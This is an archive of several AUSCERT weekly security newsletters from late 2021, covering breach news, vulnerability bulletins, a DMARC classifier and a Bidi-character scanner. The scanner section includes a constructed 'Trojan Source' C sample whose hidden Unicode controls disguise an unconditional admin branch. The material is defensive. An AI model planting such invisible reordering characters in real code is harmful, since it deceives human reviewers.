IKEA is battling an ongoing cyberattack where threat actors are targeting employees in internal phishing attacks using stolen reply-chain emails. A reply-chain email attack is when threat actors steal legitimate corporate email and then reply to them with links to malicious documents that install malware on recipients’ devices. As the reply-chain emails are legitimate emails from a company and are commonly sent from compromised email accounts and internal servers, recipients will trust the email and be more likely to open the malicious documents.

ESB-2021.1489.3 – UPDATED ALERT Real-time Operating Systems (RTOS) products: Multiple vulnerabilities
ICS-CERT updated the affected products and mitigation details on the advisory titled “ICS Advisory (ICSA-21-119-04) Multiple RTOS” issued on 30 November 2021

ESB-2021.4031 – kernel and kernel-rt: Multiple vulnerabilities
Red Hat advised that an update was released to fix multiple vulnerabilities found in kernel and kernel-rt

ESB-2021.4065 – Network Security Services: Multiple vulnerabilities
Mozilla Foundation Security Advisory 2021-51 reported critical issues affecting Network Security Services versions prior to 3.73 or 3.68. This vulnerability impacts email clients and PDF viewers that use NSS

ESB-2021.4062 – Thunderbird: Multiple vulnerabilities
Issues in Network Security Services can cause Thunderbird to crash, resulting in a denial of service or execution of arbitrary code. The problem can be corrected by applying the updates

Stay safe, stay patched and have a good weekend!

The AUSCERT team


AUSCERT Week in Review for 26th November 2021

Greetings,

Did you know that the first known computer virus was called the Creeper Virus? It affected the Advanced Research Projects Agency Network (ARPANET), the precursor to today’s internet. Since then, many more cyber attacks have occurred all over the world and have grown in sophistication and potential impact.

Tuesday 30 November is Computer Security Day, a timely reminder for individuals and businesses to stay on top of cyber security, ensuring the necessary steps are being taken to protect their data. Some suggestions to help you: change your passwords across all platforms, devices, and services and sign up to a trusted password manager so you don’t have to remember them all; update your spyware and malware protection software; and review your security strategy and best practices for staff, checking their understanding of what to do, when and how.

Time is running out to complete the 2021 BDO and AUSCERT Cyber Security Survey, closing at midnight on Friday, 3 December 2021. The 10-minute survey is an opportunity to benchmark your organisation’s cyber security efforts by gaining access to valuable data and insights into the cyber threats faced by your industry peers. Don’t forget, survey respondents will go in the draw to win an Apple Watch, so take part now for your chance to win!

Australia has a cybercrime under-reporting problem
Date: 2021-11-22 Author: Consultancy.com.au
When global IT and cybersecurity association ISACA [Information Systems Audit and Control Association] declared that “under-reporting [of] cybercrime – even when disclosure is legally mandated – appears to be the norm” back in 2019, it rang alarm bells and led to a flurry of headlines. “Half of all survey respondents believe most enterprises underreport cybercrime, even when it is required to do so,” ISACA reported.

GoDaddy’s Latest Breach Affects 1.2M Customers
Date: 2021-11-22 Author: Threat Post
The kingpin domain registrar has logged its fifth cyber-incident since 2018, after an attacker with a compromised password stole email addresses, SSH keys and database logins.

Ransomware warning: Hackers see holidays and weekends as a great time to attack
Date: 2021-11-23 Author: ZDNet
Ahead of Thanksgiving this Thursday, the US Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have released a warning for critical infrastructure providers to stay vigilant on holidays and weekends, because hackers don’t plan on taking a holiday break. The agencies issued a similar warning in August ahead of the Labor Day weekend, warning that ransomware attackers often choose to launch attacks on holidays and weekends, specifically when businesses are likely to be closed.

Apple sues spyware-maker NSO Group, notifies iOS exploit targets
Date: 2021-11-23 Author: Bleeping Computer
Apple has filed a lawsuit against Pegasus spyware-maker NSO Group and its parent company for the targeting and spying of Apple users with surveillance tech. The company says the state-sponsored attacks that used NSO’s spyware only targeted “a very small number” of individuals, across multiple platforms, including iOS and Android. The exploits used to deploy NSO Group’s Pegasus spyware were used to hack and compromise the devices of high-profile targets such as government officials, diplomats, activists, dissidents, academics, and journalists worldwide.

Black Friday: Online retailers exposed to email fraud and domain impersonation
Date: 2021-11-23 Author: Cyber Security Connect
Proofpoint has released new research that found one in four of the top online retailers in Australia today are wide open to email fraud and domain impersonation, with days to go until the start of the shopping spree of Black Friday and Cyber Monday. The study looked at the DMARC (Domain-based Message Authentication, Reporting and Conformance) records of the top 100 shopping websites ranked by Power Retail. It found that 27 companies have no DMARC record at all, leaving their customers, employees, partners and vendors exposed to receiving emails from scammers posing as trusted retailers. To date, only 16 top online retailers have achieved the highest level of DMARC protection (a reject policy), allowing these companies to block fraudulent emails from reaching inboxes.

Coin mining, ransomware, APTs target cloud: GCAT report
Date: 2021-11-24 Author: Google Cloud
While cloud customers continue to face a variety of threats across applications and infrastructure, many successful attacks are due to poor hygiene and a lack of basic control implementation. Most recently, our internal security teams have responded to cryptocurrency mining abuse, phishing campaigns, and ransomware. Given these specific observations and general threats, organizations that put emphasis on secure implementation, monitoring and ongoing assurance will be more successful in mitigating these threats or at the very least reduce their overall impact. The [Threat Horizons] report’s goal is to provide actionable intelligence that enables organizations to ensure their cloud environments are best protected against ever-evolving threats. In this and future threat intelligence reports, the Google Cybersecurity Action Team will provide threat horizon scanning, trend tracking, and Early Warning announcements about emerging threats requiring immediate action.
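The Proofpoint study above sorts retailers into three buckets (no DMARC record, a record that only monitors, and a record that rejects spoofed mail). The following is an added example, not code from the page or from Proofpoint, showing how that classification is made from the raw DMARC TXT record: it parses the tag=value syntax, treats anything that is not a valid v=DMARC1 record as missing, and flags a reject or quarantine policy that is weakened by pct<100 or a looser subdomain policy. The domain names and records are constructed for illustration; a real check fetches the TXT record at _dmarc.<domain> and passes it to classify_dmarc().

```python
"""Classify a domain's DMARC posture from its raw TXT record.

Added example, not code from the page or from Proofpoint. Records and
domain names below are constructed; in practice the record is fetched
from _dmarc.<domain> with a DNS library and handed to classify_dmarc().
"""
import re

# DMARC tag syntax (RFC 7489): "tag=value" pairs separated by ";".
_TAG_RE = re.compile(r"^\s*([a-z]+)\s*=\s*(.+?)\s*$", re.IGNORECASE)


def parse_dmarc(record):
    """Return a dict of DMARC tags, or None if the text is not a DMARC record.

    Receivers ignore a record unless its first tag is exactly v=DMARC1, so a
    typo there, or an SPF record published at _dmarc by mistake, counts the
    same as having no record.
    """
    if record is None:
        return None
    parts = [p for p in record.strip().split(";") if p.strip()]
    if not parts:
        return None
    first = _TAG_RE.match(parts[0])
    if not first or first.group(1).lower() != "v" or first.group(2).upper() != "DMARC1":
        return None
    tags = {}
    for part in parts:
        m = _TAG_RE.match(part)
        if m:
            tags[m.group(1).lower()] = m.group(2)
    return tags


def classify_dmarc(record):
    """Map a raw TXT record to: missing, none, partial, quarantine or reject.

    "reject" is the enforcement level the study calls the highest level of
    protection. "partial" flags a quarantine/reject policy that pct<100 or a
    looser sp= (subdomain policy) still lets some spoofed mail through.
    """
    tags = parse_dmarc(record)
    if tags is None:
        return "missing"
    # p= is mandatory; treat its absence as no enforcement.
    policy = tags.get("p", "none").lower()
    if policy not in ("none", "quarantine", "reject"):
        return "missing"  # malformed policy value, receivers ignore the record
    if policy == "none":
        return "none"
    pct = tags.get("pct", "100")
    sub_policy = tags.get("sp", policy).lower()
    rank = {"none": 0, "quarantine": 1, "reject": 2}
    if not pct.isdigit() or int(pct) < 100 or rank.get(sub_policy, 0) < rank[policy]:
        return "partial"
    return policy


def summarise(records):
    """Count classifications over a dict of domain -> raw TXT record (or None)."""
    counts = {"missing": 0, "none": 0, "partial": 0, "quarantine": 0, "reject": 0}
    for record in records.values():
        counts[classify_dmarc(record)] += 1
    return counts


# Constructed sample covering each bucket the study describes.
SAMPLE_RECORDS = {
    "retailer-a.example": "v=DMARC1; p=reject; rua=mailto:dmarc@retailer-a.example",
    "retailer-b.example": "v=DMARC1; p=none; rua=mailto:dmarc@retailer-b.example",
    "retailer-c.example": None,  # no _dmarc TXT record published at all
    "retailer-d.example": "v=DMARC1; p=reject; pct=50",
    "retailer-e.example": "v=DMARC1; p=quarantine; sp=none",
    "retailer-f.example": "v=spf1 include:_spf.example -all",  # SPF, not DMARC
}

if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        print(f"{domain:22} {classify_dmarc(record)}")
    print(summarise(SAMPLE_RECORDS))
```

The "partial" bucket is the one worth watching in your own domains: a p=reject record with pct=50 or sp=none reads as fully enforced in a naive check but still leaves half of direct-domain spoofs, or every subdomain spoof, deliverable.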
ESB-2021.3963 – php72: Root compromise – Existing account
The new update for php72 fixes a local privilege escalation via PHP-FPM and is available for install now

ESB-2021.3958 – ALERT salt: Multiple vulnerabilities
Multiple security vulnerabilities have been discovered in Salt, open-source software for data-driven orchestration and remote execution

ESB-2021.3965 – MozillaFirefox: Multiple vulnerabilities
Multiple Mozilla Firefox vulnerabilities have been discovered which are capable of resulting in the execution of code

ASB-2021.0242 – Microsoft Edge (Chromium-based): Execute arbitrary code/commands – Remote with user interaction
Microsoft addressed a Microsoft Edge (Chromium-based) remote code execution vulnerability in its newest update

ESB-2021.3999 – VMware vCenter Server and Cloud Foundation: Multiple vulnerabilities
Multiple vulnerabilities in VMware vCenter Server were privately reported to VMware; the new updates address arbitrary file read and SSRF vulnerabilities in affected products

Stay safe, stay patched and have a good weekend!
The AUSCERT team


AUSCERT Week in Review for 19th November 2021

Greetings,

This Sunday, November 21, is World Television Day, a time to pay homage to the tube and, in so many cases, the saviour of our recent spate of lockdown-induced boredom! The day was established by the United Nations in 1996 to recognize the impact television has in bringing world attention to conflicts and threats to peace and security, and its potential in highlighting issues of importance and significance. So, T.V. isn’t just a device to binge watch the latest season of your favourite show; in fact, as technology evolves and becomes more integrated, the use of the humble ‘idiot box’ as a major tool to inform, educate and connect grows. For those that have a Smart T.V., the following We Live Security article discusses why such T.V.s make for attractive and potentially soft targets, and how cybercriminals can ruin more than your T.V. viewing experience.

Podcasts are another way of sharing information and engaging with people far and wide, with the latest in our ‘Share Today, Save Tomorrow’ series released earlier in the week. Episode 7, ‘The future of the cyber security pipeline and education in Australia’, includes a discussion featuring Prof. Ryan Ko and Ivano Bongiovanni on how The University of Queensland Cyber Security is helping build a pipeline of cybersecurity talent. It also includes insights from AUSCERT Senior Analyst Mark about how we are supporting UQ Cyber Security through lectures as well as supervising student capstone and research projects, and more!

Today also marks thirty-six days until Christmas, yikes! With a marked shift to online shopping during the pandemic, many of us may have already started purchasing presents to ensure delivery, whilst the rest of us had better get started!

Gov unveils principles to help secure critical technology supply chains
Date: 2021-11-15 Author: iTnews
The federal government has unveiled a final set of regulatory principles aimed at helping businesses secure the supply chains of critical technologies like artificial intelligence and quantum computing.

New study shows workplace blame cultures undermining cloud adoption
Date: 2021-11-17 Author: Cyber Security Connect
New research by Veritas Technologies highlights the damage that workplace blame cultures are having on the success of cloud adoption. It found that businesses are losing critical data, such as customer orders and financial data, because office workers are too scared or too embarrassed to report data loss or ransomware issues when using cloud applications such as Microsoft Office 365. Among the latest Veritas findings, half (50 per cent) of office workers have accidentally deleted files hosted in the cloud, such as business documents, presentations and spreadsheets. The report also found that as many as 14 per cent of office workers do so multiple times per week.

Amazon’s Dark Secret: It Has Failed to Protect Your Data
Date: 2021-11-18 Author: WIRED
According to internal documents reviewed by Reveal from the Center for Investigative Reporting and WIRED, Amazon’s vast empire of customer data—its metastasizing record of what you search for, what you buy, what shows you watch, what pills you take, what you say to Alexa, and who’s at your front door—had become so sprawling, fragmented, and promiscuously shared within the company that the security division couldn’t even map all of it, much less adequately defend its borders.

Cyber attack affects Federal Group payroll system but staff will still be paid
Date: 2021-11-17 Author: ABC News
Tasmania’s largest private sector employer has been affected by a cyber attack for the second time this year. Federal Group yesterday made advance payments to staff after the payroll system it uses — run by global company Frontier Software — was affected by a “cyber incident”. Federal Group is one of more than 1,500 organisations, including the South Australian government and the Melbourne Theatre Company, that use Frontier’s software.

Official FBI email server hacked, used to send fake threat
Date: 2021-11-13 Author: The Record
A group of unidentified hackers has compromised one of the FBI’s email servers and sent out a massive wave of spam emails containing a warning about a (fake) cyberattack that was allegedly taking place. The attack, which took place in the early hours of the US East Coast morning [November 13], impacted an email server that the FBI was using for some sort of public ticketing and alerting system, Carel Bitter, Chief Data Officer at Spamhaus, told The Record in an interview today.

91% of IT leaders affected by supply chain disruption: survey
Date: 2021-11-16 Author: ZDNet
A new survey of 400 IT decision-makers from Insight Enterprises found that 95% of IT decision-makers say the impact of the pandemic accelerated business transformation priorities. The 2022 Insight Intelligent Technology Report found that nearly all of the IT leaders surveyed have been affected in some way by the IT supply chain disruption. The survey featured the responses of 400 North America-based IT leaders to a 23-question survey in September. About two-thirds said they believe their enterprise has successfully adapted to the COVID-19 pandemic and adjusted to new realities using new tech and IT processes.

ESB-2021.3890 – Moodle: Multiple vulnerabilities
Remote code execution risk in Moodle when restoring a malformed backup file

ESB-2021.3952 – php74: Root compromise – Existing account
The new update for php74 fixes a local privilege escalation via PHP-FPM

ESB-2021.3903 – FortiPortal: Cross-site scripting – Remote with user interaction
FortiPortal allows an attacker to perform reflected cross-site scripting attacks via specially crafted HTTP request parameters

ESB-2021.3933 – Google Chrome: Multiple vulnerabilities
The Chrome team has released Chrome 96 to the stable channel for Windows, Mac and Linux

ESB-2021.3939 – MozillaFirefox: Multiple vulnerabilities
SUSE has released an update which fixes 8 Mozilla Firefox vulnerabilities

Stay safe, stay patched and have a good weekend!
The AUSCERT team


AUSCERT Week in Review for 12th November 2021

Greetings,

This Saturday, November 13, is World Kindness Day, which aims to help everyone understand that compassion for others is what binds us together. The Kindness Factory is on a mission to make the world a kinder place! This not-for-profit organisation was founded by former elite cricketer Kath Koschel, following a series of events that saw her life spiral into despair and darkness without warning. But Kath fought through her ordeal and emerged with a new passion for life and a complete understanding of how powerful kindness can be. The Kindness Log is a platform for anyone to log an act of kindness, allowing people to share experiences that demonstrate how one small act of kindness can make a really big difference. Remember, the world is full of kind people. If you can’t find one, be one!

Earlier this week, AUSCERT Director Dr David Stockdale was a guest speaker at the UQ School of IT and Electrical Engineering Cybersecurity Workshop. The topics discussed covered cyber incident response within critical infrastructure and how to uplift our resilience. The session was one of four conducted throughout the day, which also discussed diversity in the cybersecurity workforce, and upskilling and inter-disciplinary cyber education, to name a few. The experiences, insights and knowledge shared by the speakers are just one of the many ways AUSCERT collaborates, informs and helps those within the field.

But with the strongly held belief that cyber security is everyone’s problem, particularly with the shift to remote working over the past eighteen months, what is being done to counter the growing cyber threat? A recent article on Cyber Security Connect discusses what businesses should be doing to help employees, and themselves, tackle the issue.

Beyond the Basics: Tips for Building Advanced Ransomware Resiliency
Date: 2021-11-05 Author: Threatpost
The rate at which ransomware attacks occur is rapidly increasing. Not only have we witnessed the rise in the frequency of these attacks, but we have also seen them evolve into more sophisticated, successful and damaging events. The potential monetary gain from a ransomware attack is now so lucrative that many ransomware developers have established affiliate programs for their tools and expertise, offering ransomware-as-a-service. Ransomware demands also continue to skyrocket as more than 80 percent of victim organizations admit to paying ransom demands.

Op-Ed: What a house cat can teach us about cybersecurity
Date: 2021-11-07 Author: Los Angeles Times
The news today often contains reports about cybersecurity breaches that steal our data or threaten our national security. The nation spends billions of dollars on cybersecurity measures, and yet we seem unable to get ahead of this problem. Why are our computers so hard to protect? Recent experience with a house cat provided insights into the nature of this problem. I am allergic to cats. My daughter came home, cat in hand, for an extended stay, and I had to find a way of confining Pounce to a limited area. However, as many cat parents would have known — though I did not — this was doomed to be a losing battle.

Businesses don’t know how to manage VPN security properly – and cyber criminals are taking advantage
Date: 2021-11-11 Author: ZDNet
Cyber attacks targeting vulnerabilities in virtual private networks (VPNs) are on the rise, and many organisations are struggling to protect their networks. The Covid-19 pandemic forced many businesses to suddenly move to higher levels of remote working than before, with many organisations dealing with it for the first time. While this was necessary to keep businesses operating, the sudden rise in remote working also provided benefits for cyber criminals, who looked to take advantage of it to carry out attacks against public-facing VPN and cloud services in order to breach networks.

Queensland water supplier Sunwater targeted by hackers in months-long undetected cyber security breach
Date: 2021-11-11 Author: ABC News
It has been revealed that hackers left suspicious files on a web server to redirect visitor traffic to an online video platform last year. Queensland’s largest regional water supplier, Sunwater, says it was targeted by hackers in a cyber security breach that went undetected for nine months. Sunwater admitted the cyber breach after the tabling of a Queensland Audit Office report into the state’s water authorities, which mentioned the incident but did not say which authority was targeted.

Microsoft November 2021 Patch Tuesday: 55 bugs squashed, two under active exploit
Date: 2021-11-10 Author: ZDNet
Microsoft has released 55 security fixes for software, including patches that resolve zero-day vulnerabilities actively exploited in the wild. The Redmond giant’s latest round of patches, usually released on the second Tuesday of each month in what is known as Patch Tuesday, includes fixes for six critical vulnerabilities, 15 remote code execution (RCE) bugs, information leaks, and elevation of privilege security flaws, as well as issues that could lead to spoofing and tampering. Products impacted by November’s security update include Microsoft Azure, the Chromium-based Edge browser, Microsoft Office — as well as associated products such as Excel, Word, and SharePoint — Visual Studio, Exchange Server, Windows Kernel, and Windows Defender.

Vagabon PhishKit – An Example of Shared Code Modularity
Date: 2021-11-03 Author: RiskIQ
In early 2021, RiskIQ first detected a new phishing campaign targeting PayPal. The campaign, authored by an actor calling themself “Vagabon”, looks to collect PayPal login credentials, as well as complete credit card information from the victim. While the kit itself doesn’t display many unique characteristics, it does contain bits and pieces of other known, familiar phish kits. This “Frankenstein” technique of piecing together modular, free or readily available kits and services has become increasingly popular.

ASB-2021.0236 – Microsoft Apps: Execute arbitrary code/commands – Existing account
Microsoft has released its monthly security patch update for November 2021

ESB-2021.3714 – docker.io: Access confidential data – Remote/unauthenticated
An information disclosure issue was discovered in the command line interface of docker.io

ESB-2021.3716.2 – UPDATE Adobe Creative Cloud Desktop Application: Multiple vulnerabilities
Adobe has released an update for the Creative Cloud Desktop application for Windows and macOS

ESB-2021.3818 – tcpdump: Denial of service – Remote/unauthenticated
A denial of service vulnerability was found in the tcpdump network traffic tool and an update is now available

ESB-2021.3856 – postgresql: Multiple vulnerabilities
Two vulnerabilities discovered in the PostgreSQL database system could allow man-in-the-middle attacks

Stay safe, stay patched and have a good weekend!
The AUSCERT team


AUSCERT Week in Review for 15th October 2021

Greetings,

This week’s image, the captivating and vibrant Jacaranda, is an iconic tree in Australia but is in fact native to Central and South America. Here at The University of Queensland, they’re even part of local lore, signifying the end of year exams, colloquially known as ‘purple panic’. The idea of panic, isolation and anxiety has been an all too common one of late, with this year’s Mental Health Week (October 9 – 17) reminding us of the need to ‘Take time – for mental health’. We can all take steps to promote better health for ourselves and others by engaging in the building blocks of wellbeing. Just remember PERMA: Positive emotion, Engagement, Relationships, Meaning, Accomplishments.

Earlier in the week, the Australian Cyber Security Centre released an update to the Essential Eight (or E8), key mitigation strategies that can save organisations considerable time, money, effort, and reputational damage. The most recent evolution of the E8 has been assessed by Cyber Security Connect as heightening the baseline for cyber security in Australia. With the growing sophistication of malicious events that target individuals and corporates through phishing, SMS malware, trojans and more, it’s important to understand the value of cyber security. CyberExperts.com delves into the impact a cyber-attack can have. In an ever-changing technological landscape that sees growing inter-connectivity, with more Internet of Things (IoT) devices connected globally and cybercrime becoming more sophisticated, cyber security is increasingly important to defend against hackers and other online threats.

Microsoft October 2021 Patch Tuesday: 71 vulnerabilities, four zero-days squashed
Date: 2021-10-13 Author: ZDNet
Microsoft has released 71 security fixes for software, including an actively-exploited zero-day bug in Win32k. The Redmond giant’s latest round of patches, usually released on the second Tuesday of each month in what is known as Patch Tuesday, includes fixes for a total of four zero-day flaws, three of which are public. Products impacted by October’s security update include Microsoft Office, Exchange Server, MSHTML, Visual Studio, and the Edge browser.

150 Million Google Users To Get 7 Days’ Notice Before Bold Security Change
Date: 2021-10-09 Author: Davey Winder
Google has confirmed that it will be pushing forward, on an ‘automatic enrollment’ basis, with a bold security update for some 150 million users before the year-end. The confirmation from Google came by way of an official safety and security blog posting this week. Yes, we are talking about two-factor authentication (2FA) here, or two-step verification (2SV) in the case of Google. What matters most here is that Google is bringing additional protection to your login credentials. Important because, as recent research into credential stuffing showed, the use of compromised login details is on the up. One significant report even pegs 61% of data breaches as involving credential misuse.

Emergency Apple iOS 15.0.2 update fixes zero-day used in attacks
Date: 2021-10-11 Author: Bleeping Computer
Apple has released iOS 15.0.2 and iPadOS 15.0.2 to fix a zero-day vulnerability that is actively exploited in the wild in attacks targeting iPhones and iPads. This vulnerability, tracked as CVE-2021-30883, is a critical memory corruption bug in IOMobileFrameBuffer allowing an application to execute arbitrary code on vulnerable devices with kernel privileges.

Microsoft Azure fends off huge DDoS Attack
Date: 2021-10-13 Author: ZDNet
Distributed Denial of Service attacks are happening ever more often and growing ever bigger. At 2.4 terabits per second, the DDoS attack Microsoft just successfully defended European Azure cloud users against could be the biggest one to date. What we know for certain is it’s the biggest DDoS attack on an Azure cloud customer. It was bigger than the previous high, 2020’s Azure 1 Tbps attack, and Microsoft reported it was “higher than any network volumetric event previously detected on Azure.” Who was targeted? We don’t know. Microsoft isn’t talking. The attack itself came from over 70,000 sources.

Student finds zero-days in Exterity devices while rick-rolling school district
Date: 2021-10-13 Author: The Record
An Illinois teenager has found a zero-day vulnerability in Exterity IPTV systems during a rick-roll prank he pulled off on his school district before graduation. On April 30 this year, Minh Duong and a group of close friends took over all networked TVs and other displays inside the six high schools that make up Illinois’ Township High School District 214 to play Rick Astley’s infamous “Never Gonna Give You Up” song disguised as an important announcement. The hack, detailed in a step-by-step blog post published last week, involved scanning the school network for connected devices, analyzing their firmware for bugs, and deploying a payload for a carefully timed attack that took over school TVs and displays during a recess, to avoid interfering with classes or exams.

ASB-2021.0193 – Microsoft Patch Tuesday update for Microsoft Extended Security Update (ESU) products for October 2021
It’s that time of month where Microsoft scares us again – there is the usual assortment of serious vulnerabilities worthy of updates. Keep your systems up to date!

ESB-2021.3357 – apache2 security update
Apache2 living up to its name, in that the denial of service and data leak risks should be enough for you to, uh, patch it too.

ESB-2021.3364 – firefox security update
Firefox fraught with fire after felonious fellows find fatal flaw with various flagshi… Actually, code execution, DoS and information disclosure are no joking matter; you should pay attention to this one.

ESB-2021.3401 – MFSA 2021-46 and MFSA 2021-47 Security Vulnerabilities fixed in Thunderbird
Do you like computers? How would you like to use emails to gain control of someone else’s computer? Wait, no, we’re the good guys… If you DON’T want to lose your servers, we recommend checking these vulnerabilities out.

ESB-2021.3415 – wordpress security update
WordPress cross-site scripting sending you cross-eyed this week, which won’t help the double vision you get when your users are impersonating each other as well. Patch time!

Stay safe, stay patched and have a good weekend!
The AUSCERT team


AUSCERT Week in Review for 5th November 2021

Greetings,

Last year’s BDO and AUSCERT Cyber Security Survey found that data breaches doubled and organisations were overconfident in their cyber controls. To challenge this trend, now is the time to review your approach to cyber security. The annual BDO and AUSCERT Cyber Security Survey identifies the current cyber security trends, issues and threats facing organisations across Australia and New Zealand. We invite you to take our 10-minute survey, which provides the opportunity to sense check your organisation’s approach to cyber risk. By taking part, you will gain access to valuable data, allowing you to benchmark your organisation’s cyber security efforts and gain insights into the cyber threats faced by your industry peers. Survey respondents will go in the draw to win an Apple Watch. The survey closes at midnight on Friday, 3 December 2021.

A recent article by ZDNet revealed that a significant number of people have accepted that remote working may be accompanied by being monitored by the companies they work for. Based on a survey of 11,000 consumers across eleven countries, the article also points out that only a small number of respondents were familiar with cyber security issues or where to report scams should they be targeted, highlighting the potential risk for organisations in a hybrid working environment.

It’s Movember again, a global campaign which quite simply asks you to pay attention to, talk about, raise funds for and, most importantly, raise awareness of men’s cancers and other men’s health issues. The traditional way to get involved is to “Grow a Mo”, but anyone can show their support by taking part in “Move for Movember”, “Host a Mo-ment” and “Mo Your Own Way”. The campaign runs for the entire month so there’s plenty of time to get involved and create your very own mo-ments to support men’s health issues.

Building sovereign resilience into Australian technology supply chains
Date: 2021-10-28 Author: Cyber Security Connect
Proofpoint threat researchers have identified a new, highly active cyber criminal threat actor, TA2722, and have colloquially named the group the ‘Balikbayan Foxes’. The group impersonates Philippine health, labour and customs organisations as well as other entities based in the Philippines. A series of campaigns impersonated multiple Philippine government entities including the Department of Health, the Philippine Overseas Employment Administration and the Bureau of Customs.

‘Trojan Source’ Bug Threatens the Security of All Code
Date: 2021-11-01 Author: Krebs on Security
Researchers with the University of Cambridge discovered a bug that affects most computer code compilers and many software development environments. At issue is a component of the digital text encoding standard Unicode […]. Specifically, the weakness involves Unicode’s bi-directional or “Bidi” algorithm, which handles displaying text that includes mixed scripts with different display orders, such as Arabic — which is read right to left — and English (left to right). “By placing Bidi override characters exclusively within comments and strings, we can smuggle them into source code in a manner that most compilers will accept. Our key insight is that we can reorder source code characters in such a way that the resulting display order also represents syntactically valid source code.”

Microsoft: This macOS flaw could have let attackers install undetectable malware
Date: 2021-11-01 Author: ZDNet
Apple has patched a security flaw in macOS that Microsoft researchers found could be used to install a malicious kernel driver, otherwise known as a ‘rootkit’. The flaw resided within macOS System Integrity Protection (SIP). It allowed a potential attacker to install a hardware interface that allows them to “overwrite system files, or install persistent, undetectable malware”.

FBI: Ransomware groups tying attacks to ‘significant financial events’
Date: 2021-11-03 Author: ZDNet
The FBI has released a new report saying ransomware groups are increasingly using “significant financial events” as leverage during their attacks. According to the FBI, ransomware groups are using events like mergers and acquisitions to target companies and force them into paying ransoms. “Prior to an attack, ransomware actors research publicly available information, such as a victim’s stock valuation, as well as material non-public information. If victims do not pay a ransom quickly, ransomware actors will threaten to disclose this information publicly, causing potential investor backlash,” the FBI wrote.

EU to adopt new cybersecurity rules for smartphones, wireless, IoT devices
Date: 2021-11-01 Author: The Record
The European Commission has ordered an update to the Radio Equipment Directive in order to introduce new cybersecurity requirements for radio and wireless equipment sold on the EU market, such as mobile phones, tablets, fitness trackers, and other smart IoT devices. The new standards, which are currently scheduled to enter into effect by mid-2024, were adopted through a delegated act to the Radio Equipment Directive, a piece of 2014 EU legislation that acts as the regulatory framework that equipment vendors must follow in order to sell electronic equipment on the EU market.

Google wants every account to use 2FA, starts auto-enrolling users
Date: 2021-11-04 Author: Ars Technica
Google announced earlier this year that it is planning to forcefully transition as many of its users as possible to two-factor authentication. The company elaborated further in October, saying it was planning to auto-enroll 150 million Google accounts in 2FA by the end of the year. Now, with just two months left in the year, Android Police has found a few reports showing that the process has started, with some users finally being auto-enrolled in 2FA.

ESB-2021.3668 – ALERT Catalyst Passive Optical Network (PON) Series Switches: Multiple vulnerabilities
Cisco has released software updates that address vulnerabilities in Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT)

ESB-2021.3667 – ALERT Policy Suite: Root compromise – Remote/unauthenticated
Cisco has released free software updates that address a vulnerability in the key-based SSH authentication mechanism of Cisco Policy Suite which could lead to root compromise

ASB-2021.0229.2 – UPDATED ALERT Unicode Directional Formatting: Multiple Vulnerabilities
An attacker could exploit Unicode bidirectional formatting characters to deceive a human code reviewer and hide unexpected and potentially dangerous behaviour

ESB-2021.3666 – GitLab: Multiple vulnerabilities
This critical vulnerability is the result of improper validation of image files by a third-party file parser, resulting in remote command execution

ESB-2021.3684 – Firefox: Multiple vulnerabilities
Firefox could be made to crash or run programs as your login if it opened a malicious website

Stay safe, stay patched and have a good weekend!
The AUSCERT team
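The ‘Trojan Source’ item and ASB-2021.0229.2 above both come down to one control: Bidi override and isolate characters must not appear in source code or comments, because the compiler reads logical order while the reviewer sees display order. The following is an added example, not code from the page, the Cambridge paper or AUSCERT, of the pre-commit check a practitioner would run: it scans text by code point for the Bidi control set and reports line and column, and offers a strip function that removes them so the file shows what the compiler will actually compile. The sample C source is constructed in the style of the paper’s early-return trick; the control character set is taken from the Unicode Bidi specification and is an assumption to tune if your code base legitimately embeds right-to-left text in string literals.

```python
"""Scan source text for Unicode bidirectional control characters.

Added example, not code from the page, the Cambridge paper or AUSCERT. The
sample source below is constructed. Scanning is by code point, not by
rendering, so it does not depend on which editor displays the file.
"""
import unicodedata

# Bidi embeddings/overrides (U+202A-U+202E), isolates (U+2066-U+2069) and
# the directional marks (U+200E, U+200F, U+061C). Assumed set; adjust if
# your code base legitimately carries RTL text in string literals.
BIDI_CONTROLS = {
    "\u202A", "\u202B", "\u202C", "\u202D", "\u202E",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
    "\u200E", "\u200F", "\u061C",                      # LRM, RLM, ALM
}


def find_bidi_controls(text):
    """Return (line, column, code point, name) for every Bidi control in text.

    Lines and columns are 1-based so they match editor and CI output.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                hits.append((lineno, col, f"U+{ord(ch):04X}", unicodedata.name(ch)))
    return hits


def strip_bidi_controls(text):
    """Remove the controls so the displayed order equals the compiled order."""
    return "".join(ch for ch in text if ch not in BIDI_CONTROLS)


def scan_file(path):
    """Scan one file on disk; errors='replace' keeps binary junk from aborting."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_bidi_controls(fh.read())


# Constructed sample in the style of the paper's "early return" example.
# Logically line 3 is a single comment that runs to "*/", so the printf is
# unconditional. A Bidi-aware renderer shows the closing brace as if it were
# inside the comment and the "if (isAdmin)" as if it were live code.
SAMPLE_SOURCE = (
    "int main() {\n"
    "    bool isAdmin = false;\n"
    "    /*\u202E } \u2066if (isAdmin)\u2069 \u2066 begin admins only */\n"
    "        printf(\"You are an admin.\\n\");\n"
    "    /* end admins only \u202E { \u2066*/\n"
    "    return 0;\n"
    "}\n"
)

if __name__ == "__main__":
    for line, col, cp, name in find_bidi_controls(SAMPLE_SOURCE):
        print(f"line {line} col {col}: {cp} {name}")
```

Run find_bidi_controls over every file in a changeset and fail the build on any hit; the stripped text is what to show a reviewer who wants to see what the compiler saw, not a replacement for rejecting the commit.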


Week in review

AUSCERT Week in Review for 1st October 2021

Greetings,

Today is International Coffee Day, an opportunity to celebrate the tasty brew that provides a kickstart to get us going or a boost to sustain us when needed. How do you prefer your coffee?

Earlier in the week, it was revealed that almost 10 million Android devices globally had been infected with malware delivered via GriftHorse apps. The Register reported on the Trojan code that has already netted millions of dollars.

ZDNet reported that many experts, including VMware and CISA, have been begging people to address CVE-2021-22005, a vulnerability in VMware vCenter, by updating their systems as soon as possible.

Microsoft rolled out a new feature to Exchange that will automatically install temporary mitigations that block actively exploited security flaws until an official patch is released by Microsoft. The Record wrote about this proactive move by Microsoft with its first-of-its-kind security feature.

